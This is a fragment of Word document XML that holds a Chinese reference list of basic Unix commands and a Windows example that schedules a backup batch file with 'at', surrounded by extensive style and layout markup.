      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mv  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>移动文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">rm </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">rm -a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录名删除目录及子目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mkdir </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>建立目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">rmdir  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除子目录，目录内没有文档。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">chmod </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设定档案或目录的存取权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">grep </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在档案中查找字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">diff </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>档案文件比较</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>档案搜寻</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">date  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>现在的日期、时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">who  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查询目前和你使用同一台机器的人以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>时间地点</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">w </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查询目前上机者的详细资料</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">whoami  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看自己的帐号名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">groups </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看某人的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Group</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">passwd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>更改密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">history </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看自己下过的命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">ps </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示进程状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">kill </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>停止某进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">gcc </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>黑客通常用它来编译</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语言写的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">su  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>权限转换为指定使用者</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>telnet IP  telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>连接对方主机（同</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>win2K</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>），当出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>bash$</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>时就说明连接成功。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>ftp ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>连接上某服务器（同</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>win2K</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>排程範例</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>若要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系統上啟動自動化的備份工作，排程服務必須執行中。您可以利用下列指令來啟動這個服務：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   net start schedule</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果排程服務正在執行中，則工作可以利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指令來加以排程，這個指令是用來呼叫批次檔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> backup.cmd (backup.cmd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的內容可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的備份排程元素找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。如果您想要在每個星期五的下午</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>點整執行這個指令，則必須呼叫下列指令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   at 20:00 /every:f cmd /c c::\db2\C21\sapscripts\backup.cmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF62AD" w:rsidRDefault="00AF62AD"/>
    <w:sectPr w:rsidR="00AF6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D48" w:rsidRDefault="007C3D48" w:rsidP="00D84D5E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007C3D48" w:rsidRDefault="007C3D48" w:rsidP="00D84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D48" w:rsidRDefault="007C3D48" w:rsidP="00D84D5E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007C3D48" w:rsidRDefault="007C3D48" w:rsidP="00D84D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9EC"/>
    <w:rsid w:val="00004FF1"/>
    <w:rsid w:val="000243CE"/>
    <w:rsid w:val="00056C72"/>
    <w:rsid w:val="0007774D"/>
    <w:rsid w:val="0008640D"/>
    <w:rsid w:val="00096340"/>
    <w:rsid w:val="000F01CC"/>
    <w:rsid w:val="000F1D5A"/>
    <w:rsid w:val="000F3277"/>
    <w:rsid w:val="000F673F"/>
    <w:rsid w:val="001019BF"/>
    <w:rsid w:val="00124DC8"/>
    <w:rsid w:val="001B41DA"/>
    <w:rsid w:val="001C356A"/>
    <w:rsid w:val="001D00FD"/>
    <w:rsid w:val="001E6FC9"/>
    <w:rsid w:val="0020176F"/>
    <w:rsid w:val="00235344"/>
    <w:rsid w:val="00265D2D"/>
    <w:rsid w:val="002A655B"/>
    <w:rsid w:val="002A7B85"/>
    <w:rsid w:val="002B0DDC"/>
    <w:rsid w:val="002B1DC4"/>
    <w:rsid w:val="002C3C98"/>
    <w:rsid w:val="002E3FF9"/>
    <w:rsid w:val="002F0743"/>
    <w:rsid w:val="002F11BF"/>
    <w:rsid w:val="0030779A"/>
    <w:rsid w:val="003136B1"/>
    <w:rsid w:val="00352633"/>
    <w:rsid w:val="00354CAE"/>
    <w:rsid w:val="003621E9"/>
    <w:rsid w:val="003E3593"/>
    <w:rsid w:val="0043570D"/>
    <w:rsid w:val="0044454B"/>
    <w:rsid w:val="00454BED"/>
    <w:rsid w:val="00460A19"/>
    <w:rsid w:val="004718DD"/>
    <w:rsid w:val="004A04E4"/>
    <w:rsid w:val="005270A0"/>
    <w:rsid w:val="0054620E"/>
    <w:rsid w:val="005548F5"/>
    <w:rsid w:val="00560D32"/>
    <w:rsid w:val="00586A2E"/>
    <w:rsid w:val="005B0D23"/>
    <w:rsid w:val="005E2928"/>
    <w:rsid w:val="005F7E70"/>
    <w:rsid w:val="006136D5"/>
    <w:rsid w:val="00622FA2"/>
    <w:rsid w:val="0065331D"/>
    <w:rsid w:val="006C19AF"/>
    <w:rsid w:val="00757F43"/>
    <w:rsid w:val="007608F8"/>
    <w:rsid w:val="0078583D"/>
    <w:rsid w:val="007A1667"/>
    <w:rsid w:val="007A3A76"/>
    <w:rsid w:val="007B3097"/>
    <w:rsid w:val="007B4F6A"/>
    <w:rsid w:val="007C3D48"/>
    <w:rsid w:val="007E23F3"/>
    <w:rsid w:val="007E526B"/>
    <w:rsid w:val="007F0D4D"/>
    <w:rsid w:val="007F6B99"/>
    <w:rsid w:val="00813618"/>
    <w:rsid w:val="00853DAB"/>
    <w:rsid w:val="008627FE"/>
    <w:rsid w:val="0086529F"/>
    <w:rsid w:val="00903BDF"/>
    <w:rsid w:val="00904476"/>
    <w:rsid w:val="009E123E"/>
    <w:rsid w:val="009E7DE7"/>
    <w:rsid w:val="00A7414C"/>
    <w:rsid w:val="00A82785"/>
    <w:rsid w:val="00A97858"/>
    <w:rsid w:val="00AA3300"/>
    <w:rsid w:val="00AA5592"/>
    <w:rsid w:val="00AF62AD"/>
    <w:rsid w:val="00B01F80"/>
    <w:rsid w:val="00BC1717"/>
    <w:rsid w:val="00BC5295"/>
    <w:rsid w:val="00BC615C"/>
    <w:rsid w:val="00BE6D5C"/>
    <w:rsid w:val="00BF59EC"/>
    <w:rsid w:val="00C00281"/>
    <w:rsid w:val="00C44712"/>
    <w:rsid w:val="00D04834"/>
    <w:rsid w:val="00D34F2F"/>
    <w:rsid w:val="00D60838"/>
    <w:rsid w:val="00D84D5E"/>
    <w:rsid w:val="00D95FE0"/>
    <w:rsid w:val="00DF540B"/>
    <w:rsid w:val="00E10A80"/>
    <w:rsid w:val="00E17599"/>
    <w:rsid w:val="00E32E9B"/>
    <w:rsid w:val="00E5629F"/>
    <w:rsid w:val="00E67598"/>
    <w:rsid w:val="00E810C9"/>
    <w:rsid w:val="00E8728E"/>
    <w:rsid w:val="00E95E8D"/>
    <w:rsid w:val="00EB581E"/>
    <w:rsid w:val="00F23BFA"/>
    <w:rsid w:val="00F2549E"/>
    <w:rsid w:val="00F725F4"/>
    <w:rsid w:val="00F94338"/>
    <w:rsid w:val="00FB3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4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4D5E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D84D5E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D84D5E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D84D5E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D84D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4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4D5E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D84D5E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D84D5E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D84D5E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D84D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130279">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="379716748">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="177501693">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1864702738">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="75"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
                <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
                <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
                <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="194854480">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="75"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="606697510">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="75"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="290133801">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1974821270">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2129006367">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="694189455">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1670401412">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1665628502">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1949046859">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1988514452">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1211959634">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="722675028">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="647633096">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="709693516">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1376585351">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1634018652">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1570336490">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="877201115">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1996295046">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="216628102">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="310521735">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
